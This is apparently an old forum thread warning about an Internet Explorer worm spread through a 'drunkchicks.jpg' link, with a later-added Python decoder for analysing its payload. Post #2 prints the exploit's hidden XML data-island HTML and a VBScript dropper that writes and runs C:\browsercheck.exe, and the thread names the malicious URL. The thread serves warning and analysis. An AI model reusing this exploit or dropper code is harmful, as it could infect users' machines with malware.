New worm/virus drunkchicks.jpg
  • New worm/virus drunkchicks.jpg

    [16:25] -O- (Broadcast) WARNING: There is a new worm spreading around. If you see a message with a URL that looks like: 'http://www.kromberg.at/<censored>=drunkchicks.jpg LOL' do NOT visit that link. If you have visited it already you have gotten infected, and you are advised to remove c:\browsercheck.exe

    Here's the image for you that only uses msiexplore
    http://svartis.punkcookies.com/~jol/jol's_desktop.jpg
    -
    My cars
    -

  • #2
    This is the newest IE exploit going around. There's a version of it going around on AIM where you will get an IM from a buddy that has the virus telling you to visit a website.

    Simple FIX: DON'T RUN IE. It sucks and it's full of unpatched holes that can lead to problems like this. Some are more than 2 years old. Use Mozilla.

    Here's the exploit

    Code:
    <div style="visibility:hidden;position:absolute;top:30px;left:20px;z-index:2">
    <span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
    <xml id="oExec">
        <security>
            <exploit>
    
                <![CDATA[
                <object id="oFile" data="drunkchicks.php"></object>
                ]]>
            </exploit>
        </security>
    </xml>
    </div>

    That passes you to a drunkchicks.php which opens up the exploit.

    Here is a section of it

    Code:
    function res(x,y)
    	For k = 0 To UBound(v)
    		v(k) = Replace(v(k), x, y)
    	Next
    End Function
    res "z", "ff"
    res "y", "00"
    For m = 0 To UBound(v)
    	it = it & v(m)
    Next
    tmp = Split(it, ",")
    Set WshShell = CreateObject("WScript.Shell")
    Set WshEnv = WshShell.Environment("Process")
    pth = WshEnv("HOMEDRIVE") & WshEnv("HOMEPATH") & "\browsercheck.exe"
    pth = "C:\browsercheck.exe"
    
    Set fso = CreateObject("Scripting.FileSystemObject")
    
    Set f = fso.CreateTextFile(pth, True)
    For i = 0 To UBound(tmp)
    	l = Len(tmp(i))
    	b = Int("&H" & Left(tmp(i), 2))
    	If l > 2 Then
    		r = Int("&H" & Mid(tmp(i), 3, l-2))
    		For j = 1 To r
    		f.Write Chr(b)
    		Next
    	Else
    		f.Write Chr(b)
    	End If
    Next
    f.Close
    WshShell.run("""" & pth & """")

    The payload is encoded. I don't know VB all that well but it looks like simple ASCII encoding. If I get bored I'll see if I can decode it.
    '98 Explorer Sport
    http://mp3car.zcentric.com (down atm)
    AMD 800mhz 192megs RAM 60gig hard drive 9 inch widescreen VGA
    80% done
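
For analysts who want the dropped file's bytes without running the script: the loop in post #2 is a run-length hex decoder (two hex digits give the byte, any further hex digits give a repeat count, after `z` and `y` are expanded to `ff` and `00`). The Python below is an added example, not part of the original thread; the `v` array is not shown in the post, so `SAMPLE_FRAGMENTS` is constructed input, and the output cap and the `triage` helper are assumptions.

```python
import hashlib
import re

SUBSTITUTIONS = (("z", "ff"), ("y", "00"))  # res "z","ff" then res "y","00"
MAX_OUTPUT = 16 * 1024 * 1024               # assumed cap against huge run counts
TOKEN = re.compile(r"[0-9a-fA-F]{2,}")

# Constructed sample standing in for the script's `v` array (not shown in the post).
SAMPLE_FRAGMENTS = ["4d,5a,90,y,03,y3,04,", "y3,z2,y2"]


def decode_payload(fragments):
    """Rebuild the bytes the script would write to disk, without executing it."""
    for old, new in SUBSTITUTIONS:
        fragments = [frag.replace(old, new) for frag in fragments]
    out = bytearray()
    for pos, token in enumerate("".join(fragments).split(",")):
        token = token.strip()
        if not TOKEN.fullmatch(token):
            raise ValueError(f"token {pos} is not hex: {token!r}")
        value = int(token[:2], 16)                           # Left(tmp(i), 2)
        count = int(token[2:], 16) if len(token) > 2 else 1  # Mid(tmp(i), 3, l-2)
        if len(out) + count > MAX_OUTPUT:
            raise ValueError(f"token {pos} exceeds the output cap")
        out.extend(bytes([value]) * count)
    return bytes(out)


def triage(data):
    """Summarise decoded bytes for an incident note: size, hash, PE magic."""
    return {
        "size": len(data),
        "sha256": hashlib.sha256(data).hexdigest(),
        "mz_header": data[:2] == b"MZ",
    }


if __name__ == "__main__":
    decoded = decode_payload(SAMPLE_FRAGMENTS)
    print(decoded.hex(" "))
    print(triage(decoded))
```
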

    • #3
      Or you could actually keep IE (and Windows for that matter) patched. But Mozilla is good too. If only the tabbrowser plugin worked 100%, I'd have fully switched; as it is, I still run both.
      -Nick

      _____________________________
      Since when is insanity a bad thing?
      www.mp3vw.com
